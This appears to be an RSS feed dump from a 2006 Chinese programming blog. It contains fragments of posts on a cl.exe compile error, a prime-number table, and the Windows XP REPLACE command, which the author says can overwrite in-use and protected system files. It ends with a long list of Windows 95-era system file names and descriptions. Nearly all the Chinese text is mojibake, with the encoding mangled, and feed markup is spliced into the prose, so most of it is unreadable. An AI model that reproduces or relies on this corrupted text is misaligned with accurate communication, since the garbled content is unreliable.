鍚庢潵鍦ㄧ綉涓婃壘鎵嶇煡閬擄紝cl.exe鏄疺C++鐪熸鐨勭紪璇戠▼搴忥紝鐩綍閿欎簡(jiǎn)灝辨壘涓嶅埌榪欎釜紼嬪簭浜?jiǎn)锛屾墍浠ュ氨鍑洪敊浜?jiǎn)锛屾睏姝讳簡(jiǎn)锛屼笉杩囦篃绠楁槸鏈夌傄?guī)敹鑾封︹?/font>

Asp 2006-10-08 20:09 鍙戣〃璇勮
]]>100000浠ュ唴鐨勮川鏁拌〃http://m.shnenglu.com/asp/archive/2006/10/06/13400.htmlAspAspFri, 06 Oct 2006 14:50:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/06/13400.htmlhttp://m.shnenglu.com/asp/comments/13400.htmlhttp://m.shnenglu.com/asp/archive/2006/10/06/13400.html#Feedback18http://m.shnenglu.com/asp/comments/commentRss/13400.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13400.html闃呰鍏ㄦ枃

Asp 2006-10-06 22:50 鍙戣〃璇勮
]]>XP涓涓緢鏃犳晫鐨勫懡浠?/title><link>http://m.shnenglu.com/asp/archive/2006/10/01/13204.html</link><dc:creator>Asp</dc:creator><author>Asp</author><pubDate>Sun, 01 Oct 2006 10:26:00 GMT</pubDate><guid>http://m.shnenglu.com/asp/archive/2006/10/01/13204.html</guid><wfw:comment>http://m.shnenglu.com/asp/comments/13204.html</wfw:comment><comments>http://m.shnenglu.com/asp/archive/2006/10/01/13204.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://m.shnenglu.com/asp/comments/commentRss/13204.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/asp/services/trackbacks/13204.html</trackback:ping><description><![CDATA[聽(tīng)聽(tīng)聽(tīng) XP鏈変竴涓緢鏃犳晫鐨勫懡浠わ紝鐢ㄦ潵鏇挎崲鏂囦歡鐨剅eplace錛岃繛姝e湪浣跨敤鐨勬枃浠朵篃鑳芥浛鎹€傞潪甯告棤鏁屻?姣斿錛氬湪C錛氫笅寤轟竴涓洰褰曪紝c錛歛aa 錛岀劧鍚庡鍒朵竴棣杕p3鍒癱:aaa騫跺懡鍚嶄負(fù)c:aaaa.mp3 錛岀劧鍚庡啀澶嶅埗鍙︿竴棣栨瓕鍒癈:a.mp3 錛岀劧鍚庣敤media player 鎾斁c:aaaa.mp3 錛屽湪鍛戒護(hù)鎻愮ず絎︿笅杈撳叆錛歳eplace c:a.mp3 c:aaa 錛岃繃涓浼?xì)锛屾槸涓嶆槸鎾攧勬瓕宸插彉?shù)負(fù)鍙︿竴棣栥? <p>鐢ㄨ繖涓懡浠ゆ潵鏇挎崲緋葷粺鏂囦歡鐪熸槸澶埥浜?jiǎn)锛岒q朵笖XP鐨勭郴緇熸枃浠朵繚鎶や篃瀵瑰畠鏃犳晥銆?鍐嶄篃涓嶇敤鍒板畨鍏ㄦā寮忎笅鍘繪浛鎹㈡枃浠朵簡(jiǎn) </p><p>鏍煎紡 </p><p>REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W] </p><p>REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W] </p><p>[drive1:][path1]filename 鎸囧畾婧愭枃浠躲?</p><p>[drive2:][path2] 鎸囧畾瑕佹浛鎹㈡枃浠剁殑 </p><p>鐩綍</p><p>/A 鎶婃柊鏂囦歡鍔犲叆鐩爣鐩綍銆備笉鑳藉拰/S 鎴?/U 鍛戒護(hù)琛屽紑鍏蟲(chóng)惌閰嶄嬌鐢ㄣ?/P 鏇挎崲鏂囦歡鎴栧姞鍏ユ簮鏂囦歡涔嬪墠浼?xì)鍏堟彁绀烘?zhèn)ㄨ繘琛岀‘璁ゃ?/R 鏇挎崲鍙鏂囦歡浠ュ強(qiáng)鏈彈淇濇姢鐨勬枃浠躲?/S 鏇挎崲鐩爣鐩綍涓墍鏈夊瓙鐩綍鐨勬枃浠躲?涓嶈兘涓?/A 鍛戒護(hù)閫夐」鎼厤浣跨敤銆?</p><p>/W 絳夋?zhèn)ㄦ彃鍏ゼ倎鐩樹(shù)互鍚庡啀杩愯銆?</p><p>/U 鍙細(xì)鏇挎崲鎴栨洿鏂版瘮婧愭枃浠舵棩鏈熸棭鐨勬枃浠躲?涓嶈兘涓?/A 鍛戒護(hù)琛屽紑鍏蟲(chóng)惌閰嶄嬌鐢ㄣ?/p><img src ="http://m.shnenglu.com/asp/aggbug/13204.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/asp/" target="_blank">Asp</a> 2006-10-01 18:26 <a href="http://m.shnenglu.com/asp/archive/2006/10/01/13204.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>WINDOWS緋葷粺鏂囦歡璇﹁Вhttp://m.shnenglu.com/asp/archive/2006/10/01/13203.htmlAspAspSun, 01 Oct 2006 10:25:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/01/13203.htmlhttp://m.shnenglu.com/asp/comments/13203.htmlhttp://m.shnenglu.com/asp/archive/2006/10/01/13203.html#Feedback0http://m.shnenglu.com/asp/comments/commentRss/13203.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13203.html
A銆鈫?
ACCESS.CHM - Windows甯姪鏂囦歡
ACCSTAT.EXE - 杈呭姪鐘舵佹寚紺哄櫒
ADVAPI32.DLL - 楂樼駭Win32搴旂敤紼嬪簭鎺ュ彛
AHA154X.MPD - SCSI椹卞姩紼嬪簭
AM1500T.VXT - 緗戝崱椹卞姩紼嬪簭
AM2100.DOS - 緗戝崱椹卞姩紼嬪簭
APPSTART.ANI - 鍔ㄧ敾鍏夋爣
APPS.HLP - Windows甯姪鏂囦歡
AUDIOCDC.HLP - "鏄撶爜緙栫爜瑙g爜鍣?甯姪鏂囦歡
AWARDPR32.EXE - 澧炲姞鎵撳嵃鏈哄伐鍏?
B銆鈫?
BIGMEM.DRV - BIGMEM铏氭嫙璁懼
BILLADD.DLL - 鍔ㄦ侀摼鎺ュ簱(鏀寔MSW)
BIOS.VXD - 鍗蟲(chóng)彃鍗崇敤BIOS鎺ュ彛
BUSLOGIC.MPD - SCSI椹卞姩紼嬪簭
C銆鈫?
CALC.EXE - 璁$畻鍣ㄥ簲鐢ㄧ▼搴?
CANNON800.DRV - 浣寵兘鎵撳嵃鏈洪┍鍔ㄧ▼搴?
CHOICE.COM - MSDOS鍛戒護(hù)
CHS16.FON - 瀛椾綋鏂囦歡(16鐐歸樀涓枃)
CANYON.MID - MIDI鏂囦歡渚嬪瓙
CARDDRV.EXE - PCMCIA鏀寔紼嬪簭
CDFS.VXD - CDROM鏂囦歡緋葷粺
CDPLAYER.EXE - CD鎾斁鍣ㄥ簲鐢ㄧ▼搴?
CDPLAYER.HLP - CD鎾斁鍣ㄥ府鍔╂枃浠?
CHIPS.DRV - 鑺墖鎶鏈樉紺洪┍鍔ㄧ▼搴?
CHKDSK.EXE - DOS紓佺洏?gòu)個(gè)鏌ュ伐鍏?
CHOOSUSR.DLL - 緗戠粶瀹㈡埛
CHOKD.WAV - 澹伴煶鏂囦歡渚嬪瓙
CIS.SCP - 鑴氭湰鏂囦歡(婕旂ず濡備綍寤虹珛涓嶤ompuserve鐨凱PP榪炴帴)
CLAIRE~1.RMI - MINI搴忓垪
CLIP.INF - 瀹夎淇℃伅鏂囦歡(鍓矘鏉挎煡鐪嬪櫒)
CLOSEWIN.AVI - 褰辯墖鍓緫(AVI)(濡備綍鍏抽棴紿楀彛)
CMC.DLL:Mail - API1.0鍏叡淇℃伅璋冪敤
COMBUFF.VXD - COM绔櫄鎷熻澶?
COMCTL32.DLL - 32浣峉hell緇勪歡
COMDLG32.DLL - 32浣嶅叕鍏卞璇濆簱
COMIC.TIF - TrueType瀛椾綋鏂囦歡(Comic Sans Ms)
COMMAND.COM - 鍏叡瀵硅瘽搴?
COMMDLG.DLL - 16浣嶅叕鍏卞璇濆簱
COMMON.HLP - OLE甯姪鏂囦歡
COMPOBJ.DLL - OLE16/32浜?浣滃簱
CONAGEN.EXE - 32浣嶆帶鍒舵敮鎸?
CONFAPI.DLL - Microsoft緗戠粶緇勪歡
CONFIG.SYS - 閰嶇疆鏂囦歡
CONFIG.TXT - 鑷堪鏂囦歡(閰嶇疆鏂囦歡涓浣曚嬌鐢ㄥ懡浠?
CONTROL.EXE - "鎺у埗闈㈡澘"搴旂敤紼嬪簭
COOL.DLL - 緇熶竴璧勬簮瀹氫綅鏂囦歡
COPY.INF - 瀹夎淇℃伅鏂囦歡
CP-1250.NLS - 鑷劧璇█鏀寔鏂囦歡
CPQNDIS.DOS - 緗戝崱椹卞姩紼嬪簭
CPQNDIS3.VXD - Compaq浠ュお鎺у埗鍣∟DIS椹卞姩紼嬪簭
CR3240.EXE - DOS6.22涓枃鐗圕R3240鎵撳嵃鏈洪┍鍔ㄧ▼搴?
CRTDLL.DLL - Microsoft C榪愯鏃墮棿搴?
CSETUP.EXE - MSDOS6.22涓枃璁劇疆紼嬪簭
CSETUP.WIN - CSetup.exe鏀寔鏂囦歡
CSMAPPER.SYS - 緋葷粺鏂囦歡(鏀寔PCMCIA)
CSPMAN.DLL - 鍔ㄦ侀摼鎺ュ簱(SoundBlaster 16 Driver)
CTRLPAN.EXE - MSDOS鍛戒護(hù)(緋葷粺鎺у埗鍙扮▼搴?
CTRLPAN.EXE - MSDOS6.22涓枃鐗堟帶鍒剁▼搴?

D銆鈫?
DBLBVFF.SYS - 鍙岀紦鍐查┍鍔ㄧ▼搴?
DC21X4.SYS - NDIS3椹卞姩紼嬪簭
DCIMAN.DLL - 鏄劇ず鎺у埗鎺ュ彛
DCIMAN32.DLL - 鏄劇ず鎺у埗鎺ュ彛
DDEML.DLL - DDE淇℃伅搴?
DEBMP.DLL - 鍏夋爡鏄劇ず璁懼
DEBUG.EXE - Debug璋冭瘯宸ュ叿
DECPSMW4.INF - 瀹夎淇℃伅鏂囦歡(DEC鎵撳嵃鏈哄畨瑁?
DECLAN.VXD - DECLAN緗戝崱椹卞姩紼嬪簭
DEFRAG - 鎵撳紑"閫夊畾椹卞姩鍣?紿楀彛
DEL.INF - 瀹夎淇℃伅鏂囦歡
DELTEMP.COM - 鍒濆鍖栧府鍔╁伐鍏?
DELTREE.EXE - 鍒犻櫎鐩綍宸ュ叿
DEMET.DLL - 鍚戦噺鏄劇ず宸ョ▼
DESKCP16.DLL - 16浣嶆闈㈡帶鍒墮潰鏉?
DESKTOP.MSN - Microsoft緗戠粶緇勪歡
DESS.DLL - 琛ㄦ牸鏄劇ず宸ョ▼
DEWP.DLL - 瀛楀鐞嗘樉紺哄伐紼?
DIALER.CNT - 瀵硅瘽甯姪
DIALER.EXE - 鐢?shù)璇濇嫧鍙方E嬪簭
DIALER.HLP - 鐢?shù)璇濇嫧鍙峰府鍔╂枃錃g
DIALMON.EXE - 鎷ㄥ彿鐩戣紼嬪簭(IE2.0)
DIBENG.DLL - 鐙珛璁懼鐨勪綅鍚屽伐紼?
DICONIX.DRX - 鎵撳嵃鏈洪┍鍔?
DIRECTCC.EXE - 鐩存帴綰跨紗榪炴帴搴旂敤紼嬪簭
DISKCOMP - 紓佺洏姣旇緝宸ュ叿
DISKCOPY.COM - 紓佺洏鎷瘋礉宸ュ叿
DISKDRV.INF - 瀹夎淇℃伅
DISPLAY.TXT - 鏄劇ず鍗EADME鏂囦歡
DMCOLOR.DLL - 閫氱敤鎵撳嵃椹卞姩紼嬪簭褰╂墦鏀寔搴?
DOSKEY.COM - DOS鍛戒護(hù)
DOSX.EXE - MSDOS閰嶇疆紼嬪簭
DRAGDROP.AVI - 褰辯墖鍓緫(AVI)(濡備綍浣跨敤鎷栨嫿)
DRIVER.SYS - DOS椹卞姩紼嬪簭
DRVSPACE.EXE - 紓佺洏鍘嬬緝宸ュ叿
DRVSPACE.HLP - 紓佺洏絀洪棿綆$悊甯姪鏂囦歡

E銆鈫?
EDIT.COM - DOS鏂囧瓧緙栬緫紼嬪簭
EDLIN.EXE - DOS琛岀紪杈戝櫒
EE16.VXD - 铏氭嫙璁懼椹卞姩紼嬪簭
EISA.VXD - 鍗蟲(chóng)彃鍗崇敤EISA鎬葷嚎璁℃暟鍣?
EK550C.ICM - 鎵撳嵃鏈虹畝浠?
EMM386.EXE - 鎵╁睍鍐呭瓨綆$悊紼嬪簭
ENABLE.INF - 鍒濆鍖栦俊鎭?
ENGCT.EXE - MSN鏀寔鏂囦歡
ESCP24SC.DRV - 璁懼椹卞姩紼嬪簭
EUDCEDIT.CNF - 甯姪绱㈠紩鏂囦歡(閫犲瓧紼嬪簭)
EUDCEDIT.EXE - 閫犲瓧紼嬪簭
EUDCEDIT.HLP - 甯姪鏂囦歡(閫犲瓧紼嬪簭)
EUDCEDIT.INF - 瀹夎淇℃伅鏂囦歡(閫犲瓧紼嬪簭)
EVX16.DOS - 緗戝崱椹卞姩紼嬪簭
EWRK3.DOS - 緗戝崱椹卞姩紼嬪簭
EWRK3.SYS - 緗戝崱椹卞姩紼嬪簭
EXCEL.XLS - Excel5.0鏂囦歡妯℃澘
EXCEL4.XLS - Excel4.0鏂囦歡妯℃澘
EXCHANGE.TXT - Inbox鍜孍xchange鐨勮嚜榪版枃浠?
EXCHNG.CNT - Mail/Exchange甯姪鏂囦歡鍐呭
EXCHNG.HLP - Mail/Exchange緇勪歡
EXCHNG32.EXE - 瀵圭敤鎴風(fēng)殑浜ゆ崲鏈轟綔鍒濆璁劇疆
EXPLORER.AVI - 褰辯墖鍓緫(AVI)(濡備綍浣跨敤璧勬簮綆$悊鍣?
EXPLORER.EXE - "璧勬簮綆$悊鍣?搴旂敤紼嬪簭
EXPO.HLP - 甯姪鏂囦歡(浜у搧淇℃伅)
EXPOSTRT.EXE - 浜у搧淇℃伅搴旂敤紼嬪簭
EXTRACT.EXE - 瑙e帇緙╁伐鍏?
EXTRA.TXT - 鑷堪鏂囦歡(鑱旀満璁塊棶闄勫姞鏂囦歡)

F銆鈫?
FAQ.TXT - 鐤戦毦瑙g瓟鑷堪鏂囦歡
FAXCODEC.DLL - 浼犵湡緙栫爜/璇戠爜鍣?
FAXCOVER.EXE - 灝侀潰緙栬緫鍣?
FC.EXE - DOS鍛戒護(hù),姣旇緝涓や釜鏂囦歡
FD16-700.MPD - SCSI椹卞姩紼嬪簭
FD8XX.MPD - SCSI椹卞姩紼嬪簭
FDISK.EXE - DOS鍛戒護(hù),鍦ㄧ‖鐩樹(shù)笂寤虹珛銆佸垹闄ゅ強(qiáng)鏄劇ず褰撳墠鍒嗗尯
FILESEC.VXD - 鏂囦歡瀛樺彇鎺у埗綆$悊鍣?
FILEXFER.CNT - 鏂囦歡浼犺緭甯姪鏂囦歡鍐呭
FILEXFER.EXE - Microsoft鏂囦歡浼犺緭
FIND.AVI - 褰辯墖鍓緫(濡備綍浣跨敤鏌ユ壘)
FIND.EXE - 瀵繪壘鎸囧畾瀛楃涓插懡浠?
FINDMVI.DLL - 濯掍綋瑙嗚鏀寔
FINSTALL.DLL - 瀛楀簱瀹夎紼嬪簭
FINSTALL.HLP - 瀛楀簱瀹夎甯姪鏂囦歡
FLSIMTD.VXD - PCMCIA鏀寔
FLSIMTD.VXD - PCMCIA鏀寔
FONT16.EXE - DOS6.22涓枃鐗?6鐐歸樀瀛椾綋椹卞姩紼嬪簭
FONTS.INF - 瀛椾綋閫夋嫨鍒濆鍖栦俊鎭?
FONTVIEW.EXE - 瀛椾綋嫻忚紼嬪簭
FORMAT.COM - DOS紓佺洏鏍煎紡鍖栧伐鍏?
FOUTLINE.EXE - 杞粨瀛椾綋椹卞姩紼嬪簭
FRAMEBUF.DRV - SVGA鏄劇ず鍣ㄩ┍鍔ㄧ▼搴?
FTE.DLL - 澹伴煶嫻忚鏂囦歡浼犺緭宸ョ▼鏂囦歡
FTP.EXE - 鏂囦歡浼犺緭鍗忚TCP宸ュ叿
FURELI~1.RMI - MINI搴忓垪
G銆鈫?
GBK.TXT - 涓枃Windows95GBK浠g爜闆嗗瓧絎﹀畾涔夎〃
GDI.EXE - 綆鐗圵IN3.1鍥懼艦鐣岄潰
GDI32.DLL - 32浣岹DI鍥懼艦鐣岄潰
GENERAL.IDF - 涓鑸琈IDI鎸囩ず鍣?
GRPCONV.EXE - Windows紼嬪簭緇勮漿鎹㈠櫒
GUIDE.EXE - 搴旂敤紼嬪簭(MSN)

H銆鈫?
HARDWARE.TXT - 紜歡鑷堪鏂囦歡
HOSTS.SAM - TCP閰嶇疆
HPCLRLSK.ICM - 鎵撳嵃綆浠?
HPDESK.ICM - 鎵撳嵃鏈虹畝浠嬭〃
HPDSKJET.DRV - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
HPEISA.VXD - 緗戠粶閫傞厤鍣ㄩ┍鍔ㄧ▼搴?
HPJAHLP.CNT - JetAdmin紼嬪簭甯姪鏂囦歡
HPJD.DLL - HPJetAdmin鏀寔紼嬪簭
HPLAN.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔ㄧ▼搴?
HPLJ300.DRV - HPLJ300DPI鎵撳嵃鏈洪┍鍔ㄧ▼搴?
HPLJ300.EXE - MSDOS鍛戒護(hù)(HP鎵撳嵃鏈洪┍鍔?
HPLJ-31.SPD - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
HPLJ600.DRV - HPLJ600DPI鎵撳嵃鏈洪┍鍔ㄧ▼搴?
HPLJP-V4.INF - 鎵撳嵃鏈哄畨瑁呬俊鎭?
HPNETPRN.INF - HPJetAdmin鏀寔紼嬪簭
HPPJXL31.SPD - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
HPPLOT.DRV - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
HPPLOT.HLP - 鎵撳嵃鏈洪┍鍔ㄧ▼搴忓府鍔╂枃浠?
HPPRARBK.DLL - HPJetAdmin鏀寔紼嬪簭
HPPRARRK.HLP - HPJetAdmin鏀寔紼嬪簭甯姪鏂囦歡
HPVCM.HPM - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
HSFLOP.PDR - HSFLOP铏氭嫙璁懼
HTICONS.DLL - 緇堢璁懼鍔ㄦ侀摼鎺ュ簱
HYPERTRM.CNT - 緇堢璁懼甯姪鏂囦歡
HYPERTRM.EXE - 緇堢璁懼搴旂敤紼嬪簭
HYPERTRM.HLP - "瓚呯駭緇堢"甯姪
HZKBD.EXE - 甯哥敤杈撳叆鏂規(guī)硶紼嬪簭
HZVIO95.EXE - 鏄劇ず椹卞姩紼嬪簭
I銆鈫?
I82593.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔ㄧ▼搴?
IB401917.SPD - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
IBM20470.SPD - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
IBM20K.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔ㄧ▼搴?
ICM32.DLL - 鍥捐薄棰滆壊鍖歸厤紼嬪簭
ICMOI.DLL - 鐢ㄦ埛鐣岄潰棰滆壊鍖歸厤紼嬪簭
ICONLIB.DLL - 鍥劇搴?
IEXPLORE.CNT - 甯姪绱㈠紩鏂囦歡(IE)
IEXPLORE.EXE - InternetExplore
IEXPLORE.HLP - 甯姪鏂囦歡(IE)
IFSHLP.SYS - 鏂囦歡緋葷粺瀹夎甯姪鏂囦歡
IFSMGR.VXD - 鏂囦歡緋葷粺瀹夎綆$悊紼嬪簭
IMAGEOIT.EXE - 鍥捐薄緙栬緫鍣ㄥ厜鏍囩▼搴?
IMCLIENT.DLL - Microsoft緗戠粶緇勪歡
IME.CNT - 甯姪绱㈠紩鏂囦歡(涓枃杈撳叆娉?
IME.HLP - Windows甯姪鏂囦歡
IME.INF - 瀹夎淇℃伅鏂囦歡(涓枃杈撳叆娉?
IMEGEN.CNF - 甯姪绱㈠紩鏂囦歡(杈撳叆娉曠敓鎴愬櫒)
IMEGEN.EXE - 杈撳叆娉曠敓鎴愬櫒
IMEGEN.HLP - 甯姪鏂囦歡(杈撳叆娉曠敓鎴愬櫒)
IMEINFO.INI - 杈撳叆娉曞垵濮嬪寲鏂囦歡
IMM32.DLL - WIN32IMM搴旂敤紼嬪簭鐣岄潰
INBOX.EXC - 閭歡緇勪歡
INDICDLL.DLL - 澶氳璦緇勪歡
INET.TXT - IE鑷堪鏂囦歡
INET16.DLL - 鍔ㄦ侀摼鎺ュ簱(鏀寔IE2.0)
INETAB32.DLL - 鍔ㄦ侀摼鎺ュ簱(鏀寔Internet mail)
INETCFG.DLL - 鍔ㄦ侀摼鎺ュ簱(鏀寔IE2.0)
INETCPL.CPL - 鎺у埗闈㈡澘鏂囦歡(閰嶇疆IE2.0)
INETMAIL.INF - 瀹夎淇℃伅鏂囦歡(Internet mail)
INETWIZ.EXE - Internet瀹夎鍚戝
INformS.WPF - 鏍鋒澘鏂囦歡
INSTBE.BAT - Microsoft緗戠粶緇勪歡
INSTDICT.EXE - MSDOS鍛戒護(hù)(杈撳叆娉曞畨瑁呯▼搴?
INTB.VXD - 13鍙蜂腑鏂櫄鎷熻澶?
INTL.CPL - 鎺у埗闈㈡澘
INT-MAIL.CNT - 甯姪绱㈠紩鏂囦歡(Internet mail)
IOS.INI - 璁劇疆闇瑕佸畨鍏ㄤ繚鎶ょ殑紼嬪簭
IOSCLASS.DLL - CDROM瀹夎紼嬪簭
IRMATR.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔ㄧ▼搴?
ISAPNP.VXD - ISA鎬葷嚎鍗蟲(chóng)彃鍗崇敤紼嬪簭
銆鈫?
JOY.CPL - 娓告垙鏉嗘帶鍒墮潰鏉?
JOYSTICK.INF - 澶氬獟浣撳畨瑁呬俊鎭?
JP350.DRV - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
JUNGLE~1.WAV - 澹伴煶鏂囦歡

K銆鈫?
KBDBE.KBD - 姣斿埄鏃墮敭鐩樻牸寮?
KBDBR.KBD - 宸磋タ閿洏鏍煎紡
KBDCA.KBD - 娉曞浗銆佸姞鎷垮ぇ閿洏鏍煎紡
KBDOS.KBD - 緹庡浗閿洏鏍煎紡
KDCOLOR1.SPD - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
KERNEL32.DLL - 32浣嶅唴鏍?
KEYB.COM - 灝嗘帶鍒墮敭鐩樼▼搴忚鍏ュ唴瀛?
KODAKCE.ICM - 鏌揪ICC閰嶇疆鏂囦歡
KRNL386.EXE - Core搴旂敤紼嬪簭

L銆鈫?
LABEL.EXE - DOS鍛戒護(hù),璁劇疆紓佺洏鍚嶇О
LFNBK.EXE - 闀挎枃浠跺悕澶囦喚鏂囦歡
LFNBK.TXT - LFNBK鐨勮嚜榪版枃浠?
LICENSE.HLP - Windows甯姪鏂囦歡
LMSCRIPT.EXE - LAN綆$悊鍣ㄦ枃紼垮鐞嗙▼搴?
LOGIN.EXE - Win95鐧誨綍NetWare鏂囦歡
LQ1600K.EXE - LQ1600K鎵撳嵃椹卞姩紼嬪簭

M銆鈫?
MAILMSG.DLL - 寰蔣緗戠粶緇勪歡
MAILOPT.INF - MAIL/MAPI璁劇疆鏂囦歡
MAPI.DLL - Mail/Exchange緇勪歡
MCIAVI.DRV - 澶氬獟浣撻┍鍔ㄧ▼搴?
MCICDA.DRV - MCICD澹伴煶椹卞姩紼嬪簭
MCIOLE.DLL - MCIOLE鍙ユ焺
MCIPIONR.DRV - MCI鍏夌洏椹卞姩紼嬪簭
MCISEQ.DRV - MCI瀹氬簭鍣ㄩ┍鍔ㄧ▼搴?
MCIVISCA.DRV - MCIVCR椹卞姩紼嬪簭
MCIWAVE.DRV - MCI Ware椹卞姩紼嬪簭
MDMNOKIA.INF - 瀹夎淇℃伅鏂囦歡(modem)
MDMNOVA.INF - 瀹夎淇℃伅鏂囦歡(modem)
MDMVV.INF - 瀹夎淇℃伅鏂囦歡(modem)
MEMMAKER.EXE - 鍐呭瓨綆$悊紼嬪簭
MEMMAKER.INF - 鍐呭瓨綆$悊紼嬪簭璁劇疆淇℃伅
MFCUIA32.DLL - OLEI鍏叡瀵硅瘽鍔ㄦ侀摼鎺ュ簱
MIDI.INF - 鍗蟲(chóng)彃鍗崇敤MIDI璁懼淇℃伅
MINET32.DLL - 鏀寔Internet Mail鍔ㄦ侀摼鎺ュ簱
MKECR5XX.MPD - SCSI椹卞姩紼嬪簭
ML3XEC16.EXE - 搴旂敤紼嬪簭(MAPI)
MLSHEXT.DLL - 寰蔣鏍告墿灞曞簱
MMCI.DLL - 濯掍綋綾誨畨瑁呯▼搴?
MMDEVLDR.VXD - 鍗蟲(chóng)彃鍗崇敤璁懼瑁呰澆紼嬪簭
MMDRV.HLP - 澶氬獟浣撳府鍔╂枃浠?
MMSOUND.DRV - 澶氬獟浣撻┍鍔ㄧ▼搴?
MMSYSTEM.DLL - 澶氬獟浣撶郴緇熷唴鏍?
MMTASK.TSK - 澶氬獟浣撹儗鏅換鍔′氦鎹㈠櫒
MODE.COM - DOS鍛戒護(hù)
MODERN.FON - 瀛椾綋鏂囦歡(modem)
MORE.COM - DOS鍛戒護(hù)
MOUSE.DRV - 榧犳爣椹卞姩紼嬪簭
MOVEWIN.AVI - 褰辯墖鍓緫(濡備綍縐誨姩紿楀彛)
MPLAYER.EXE - 濯掍綋鎾斁紼嬪簭
MPR.DLL - WIN32緗戠粶鎺ュ彛鍔ㄦ侀摼鎺ュ簱
MSAB32.DLL - 寰蔣緗戠粶鍦板潃綈?
MSBASE.INF - 璁劇疆淇℃伅
MSCDEX.EXE - DOS MSCDEX CDROM鎵╁睍宸ュ叿
MSCDROM.INF - 綾誨畨瑁呰緗俊鎭?
MSD.EXE - 寰蔣璇婃柇宸ュ叿
MSD.INI - 寰蔣璇婃柇鍒濆鍖?
MSDET.INF - 緋葷粺媯(gè)嫻嬭緗俊鎭?
MSDISP.INF - 鏄劇ず璁劇疆淇℃伅
MSDLG.EXE - 鏁版嵁閾炬帴鎺у埗鍗忚
MSDOS.INF - 璁劇疆淇℃伅
MSDOSDRV.TXT - 璁懼椹卞姩紼嬪簭鑷堪鏂囦歡
MSFT.VRL - 緇熶竴璧勬簮瀹氫綅鏂囦歡
MSGSRV32.EXE - Windows32浣嶈櫄鎷熻澶囦俊鎭郴緇?
MSHDC.INF - 紜洏鎺у埗璁劇疆淇℃伅
MSJSTICK.DRV - 鍗蟲(chóng)彃鍗崇敤娓告垙鏉嗛┍鍔ㄧ▼搴?
MSMAIL.INF - Mail/MAPI鍒濆鍖?
MSMOUSE.INF - 榧犳爣璁劇疆淇℃伅
MSN.TXT - 寰蔣緗戠粶鑷堪鏂囦歡
MSNET32.DLL - 寰蔣32浣嶇綉緇淎PI搴?
MSNEXCH.EXE - 寰蔣緗戠粶璁劇疆紼嬪簭
MSNPSS.HLP - 寰蔣緗戠粶甯姪鏂囦歡
MSNVER.TXT - 寰蔣緗戠粶甯姪淇℃伅
MSPAINT.EXE - 鐢誨浘宸ュ叿
MSPCIC.DLL - PCMCIA綾誨畨瑁呬笌鎺у埗宸ュ叿
MSPORTS.INF - 鍏叡璁劇疆淇℃伅
MSPP32.DLL - 寰蔣緗戠粶鎵撳嵃鏀寔紼嬪簭
MSPWL32.DLL - 鍙d護(hù)娓呭崟綆$悊搴?
MSSBLST.DRV - 澹伴湼鍗¢┍鍔ㄧ▼搴?
MSSBLSI.VXD - 澹伴湼鍗¢┍鍔ㄧ▼搴?
MSSHRVI.DLL - 鍏變韓鍐呮牳鎵╁睍紼嬪簭
MSSNDSYS.DRV - Windows澹伴煶緋葷粺椹卞姩紼嬪簭
MSSP.VXP - Windows NT瀹夊叏鏀寔
MSTCP.DLL - TCP鐢ㄦ埛鐣岄潰
MSVIEWUT.DLL - 鏄劇ず璁懼鏈嶅姟鏁版嵁閾炬帴搴?
MTMMINIP.MPD - SCSI椹卞姩紼嬪簭
MULLANG.INF - 澶氱璇█瀛椾綋鏀寔璁劇疆淇℃伅
MVIWAVE.DRV - 澹伴煶椹卞姩紼嬪簭
N銆鈫?
NBTSTAT.EXE - TCP宸ュ叿
NDDEAPI.DLL - Workgroups DDE鍏變韓鎺ュ彛
NDDENB.DLL - 寰蔣緗戠粶DDE NetBIOS鎺ュ彛
NDISHLP.SYS - 瀹炴ā寮廚DIS鏀寔椹卞姩紼嬪簭
NET.EXE - 瀹炴ā寮忕綉緇滃鎴瘋蔣浠?
NET.INF - 緗戠粶媯(gè)嫻嬩俊鎭?
NET.MSG - 緗戠粶瀹㈡埛淇℃伅
NET3COM.INF - 緗戠粶璁劇疆淇℃伅
NETAMD.INF - 緗戠粶璁劇疆淇℃伅
NETAPI.DLL - 緗戠粶搴旂敤紼嬪簭鎺ュ彛鍔ㄦ侀摼鎺ュ簱
NETAPI32.DLL - 32浣嶇綉緇淎PI鍔ㄦ侀摼鎺ュ簱
NETAVXT.INF - MS鍐呴儴浼犺緭鏂囦歡
NETBEUI.VXD - 32浣峃etBEUI鍗忚
NETBIOS.DLL - NetBIOSAPI搴?
NETDCA.INF - 瀹夎淇℃伅鏂囦歡
NETDDE.EXE - Windows緗戠粶鍔ㄦ佹暟鎹氦鎹?
NETDET.INI - NetWare媯(gè)嫻嬫枃浠?
NETDI.DLL - 緗戠粶璁懼瀹夎
NETH.MSG - 緗戠粶瀹㈡埛甯姪淇℃伅
NETOS.DLL - NOS媯(gè)嫻婦LL
NETWATCH.EXE - 緗戠粶瑙傛祴紼嬪簭
NETWORK.TXT - 緗戠粶淇℃伅鑷堪鏂囦歡
NOTEPAD.EXE - 璁頒簨鏈簲鐢ㄧ▼搴?
NODRIVER.INF - 鍗蟲(chóng)彃鍗崇敤璁懼淇℃伅
NOTEPAD.EXE - NOTEPAD鏂囦歡
NSCL.VXD - NSCL铏氭嫙璁懼
